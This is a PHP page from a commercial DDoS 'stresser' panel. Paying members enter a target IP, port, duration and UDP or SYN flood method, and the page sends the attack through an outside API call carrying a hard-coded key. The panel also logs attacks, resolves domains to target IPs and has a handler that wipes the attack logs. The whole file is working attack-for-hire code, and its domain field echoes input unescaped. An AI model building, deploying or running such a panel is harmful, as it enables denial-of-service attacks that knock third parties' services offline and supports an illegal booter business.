DDoS Script

1. <?php
2. ob_start();
3. require_once 'includes/db.php';
4. require_once 'includes/init.php';
5. if (!($user -> LoggedIn()))
6. {
7. header('location: login.php');
8. die();
9. }
10. if (!($user->hasMembership($odb)))
11. {
12. header('location: purchase.php');
13. die();
14. }
15. if (!($user -> notBanned($odb)))
16. {
17. header('location: login.php');
18. die();
19. }
20. ?>
21. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
22. <html xmlns="http://www.w3.org/1999/xhtml">
23. <head>
24. <title><?php echo $title_prefix; ?>Stresser</title>
25. <?php include 'includes/css.php';?>
26. </head>
27. <body>
28. <?php
29. include 'sidebar.php';
30. ?>
31. <!-- Right side -->
32. <div id="rightSide">
33. <?php include 'header.php';?>
34.  
35.  
36.  
37.  
38. <!-- Title area -->
39. <div class="titleArea">
40. <div class="wrapper">
41. <div class="pageTitle">
42. <h3>Stresser</h3>
43. </div>
44. <div class="clear"></div>
45. </div>
46. </div>
47.  
48. <div class="line"></div>
49.  
50.  
51.  
52. <!-- Main content wrapper -->
53. <div class="wrapper">
54. <!-- Form -->
55. <?php
56. if (isset($_POST['attackBtn']))
57. {
58. $host = $_POST['host'];
59. $port = intval($_POST['port']);
60. $time = intval($_POST['time']);
61. $method = $_POST['method'];
62. $errors = array();
63. if (empty($host) || empty($time) || empty($port) || empty($method))
64. {
65. $errors[] = 'Please verify all fields';
66. }
67. if (!filter_var($host, FILTER_VALIDATE_IP))
68. {
69. $errors[] = 'Host is invalid';
70. }
71. $allowedMethods = array('UDP', 'SSYN');
72. if (!in_array($method, $allowedMethods))
73. {
74. $errors[] = 'Method is invalid';
75. }
76. $SQLCheckBlacklist = $odb -> prepare("SELECT COUNT(*) FROM `blacklist` WHERE `IP` = :host");
77. $SQLCheckBlacklist -> execute(array(':host' => $host));
78. $countBlacklist = $SQLCheckBlacklist -> fetchColumn(0);
79. if ($countBlacklist > 0)
80. {
81. $errors[] = 'IP is Blacklisted if you would like to black list your IP then visit the dashboard and there is a guide';
82. }
83. if (empty($errors))
84. {
85. $checkRunningSQL = $odb -> prepare("SELECT COUNT(*) FROM `logs` WHERE `user` = :username AND `time` + `date` > UNIX_TIMESTAMP()");
86. $checkRunningSQL -> execute(array(':username' => $_SESSION['username']));
87. $countRunning = $checkRunningSQL -> fetchColumn(0);
88. if ($countRunning == 0)
89. {
90. $SQLGetTime = $odb -> prepare("SELECT `plans`.`mbt` FROM `plans` LEFT JOIN `users` ON `users`.`membership` = `plans`.`ID` WHERE `users`.`ID` = :id");
91. $SQLGetTime -> execute(array(':id' => $_SESSION['ID']));
92. $maxTime = $SQLGetTime -> fetchColumn(0);
93. if (!($time > $maxTime))
94. {
95. @file_get_contents("https://network-stressing.net/stresser/api.php?key=D0qfXtk@F^I5$kTge&host=$host&port=$port&time=$time&method=$method");
96. $insertLogSQL = $odb -> prepare("INSERT INTO `logs` VALUES(:user, :ip, :port, :time, :method, UNIX_TIMESTAMP())");
97. $insertLogSQL -> execute(array(':user' => $_SESSION['username'], ':ip' => $host, ':port' => $port, ':time' => $time, ':method' => $method));
98. echo '<div class="nNote nSuccess hideit"><p><strong>SUCCESS: </strong>Attack has been sent to '.$host.':'.$port.' for '.$time.' seconds using '.$method.'</p></div>';
99. }
100. else
101. {
102. echo '<div class="nNote nAttention hideit"><p><strong>ERROR: </strong>Your max boot time is '.$maxTime.'</p></div>';
103. }
104. }
105. else
106. {
107. echo '<div class="nNote nFailure hideit"><p><strong>ERROR: </strong>You currently have a boot running. Please wait for it to be over.</p></div>';
108. }
109. }
110. else
111. {
112. echo '<div class="nNote nFailure hideit"><p><strong>ERROR:</strong><br />';
113. foreach($errors as $error)
114. {
115. echo '-'.$error.'<br />';
116. }
117. echo '</div>';
118. }
119. }
120. ?>
121. <form action="" class="form" method="POST">
122. <fieldset>
123. <div class="nNote nInformation hideit"><p><strong>Information:</strong>We are currently having issues with our stresser at the moment. We are trying to fix it. This should be done in about 24 Hours of Maintenance!</p></div>
124. <div class="widget">
125. <div class="title"><img src="images/icons/dark/list.png" alt="" class="titleIcon" /><h6>DDoS Tool</h6></div>
126. <div class="formRow">
127. <label>Host</label>
128. <div class="formRight"><input type="text" maxlength = "15" name="host" /></div>
129. <div class="clear"></div>
130. </div>
131. <div class="formRow">
132. <label for="labelFor">Port</label>
133. <div class="formRight"><input type="text" name="port" value="" /></div>
134. <div class="clear"></div>
135. </div>
136. <div class="formRow">
137. <label for="labelFor">Time</label>
138. <div class="formRight"><input type="text" name="time" value="" /></div>
139. <div class="clear"></div>
140. </div>
141. <div class="formRow">
142. <label>Method</label>
143. <div class="formRight">
144. <input type="radio" name="method" id="method1" value="UDP" /><label for="method1">UDP</label>
145. <input type="radio" name="method" id="method2" value="SSYN" /><label for="method2">SSYN</label>
146. </div><div class="clear"></div>
147. </div>
148. <div class="formRow">
149. <input type="submit" value="DDoS" name="attackBtn" class="dblueB logMeIn" />
150. <div class="clear"></div>
151. </div>
152. </div>
153. </fieldset>
154. </form>
155. <?php
156. $resolved = '';
157. $domain = '';
158. if (isset($_POST['resolveBtn']))
159. {
160. $domain = $_POST['domain'];
161. $resolved = gethostbyname($domain);
162. }
163. ?>
164. <form action="" class="form" method="POST">
165. <fieldset>
166. <div class="widget">
167. <div class="title"><img src="images/icons/dark/list.png" alt="" class="titleIcon" /><h6>Host To IP</h6></div>
168. <div class="formRow">
169. <label>Domain Name</label>
170. <div class="formRight"><input type="text" name="domain" value="<?php echo $domain; ?>"/></div>
171. <div class="clear"></div>
172. </div>
173. <div class="formRow">
174. <?php echo $resolved;?>
175. <input type="submit" value="Resolve" name="resolveBtn" class="dblueB logMeIn" />
176. <div class="clear"></div>
177. </div>
178. </div>
179. </fieldset>
180. </form>
181. </div>
182. <!-- Main content wrapper -->
183. <div class="wrapper">
184. <?php
185. if (isset($_POST['']))
186. {
187. $SQL = $odb -> query("TRUNCATE `logs`");
188. echo '<div class="nNote nSuccess hideit"><p><strong>SUCCESS: </strong>Logs have been cleared</p></div>';
189. }
190. ?>
191. <div class="widget">
192. <div class="title"><img src="../images/icons/dark/frames.png" alt="" class="titleIcon" /><h6>Logs</h6><form action = "" METHOD="post" class="form">
193. <input type="submit" style="margin-top: 4px; margin-right:4px;" class="dblueB logMeIn" />
194. </form></div>
195. <table cellpadding="0" cellspacing="0" width="100%" class="sTable">
196. <thead>
197. <tr>
198. <td>User</td>
199. <td>IP</td>
200. <td>Port</td>
201. <td>Time</td>
202. <td>Method</td>
203. <td>DATE</td>
204. </tr>
205. </thead>
206. <tbody>
207. <?php
208. $SQLGetLogs = $odb -> query("SELECT * FROM `logs` ORDER BY `date` DESC");
209. while($getInfo = $SQLGetLogs -> fetch(PDO::FETCH_ASSOC))
210. {
211. $user = $getInfo['user'];
212. $IP = $getInfo['ip'];
213. $port = $getInfo['port'];
214. $time = $getInfo['time'];
215. $method = $getInfo['METHOD'];
216. $date = DATE("m-d-Y, h:i:s a" ,$getInfo['date']);
217. echo '<tr><td><center>'.$user.'</center></td><td><center>'.$IP.'</center></td><td><center>'.$port.'</center></td><td><center>'.$time.'</center></td><td><center>'.$method.'</center></td><td><center>'.$date.'</center></td></tr>';
218. }
219.  
220. ?>
221. </tbody>
222. </table>
223. </div>
224.  
225. </div>
226.  
227. <!-- Footer line -->
228. <?php include 'footer.php';?>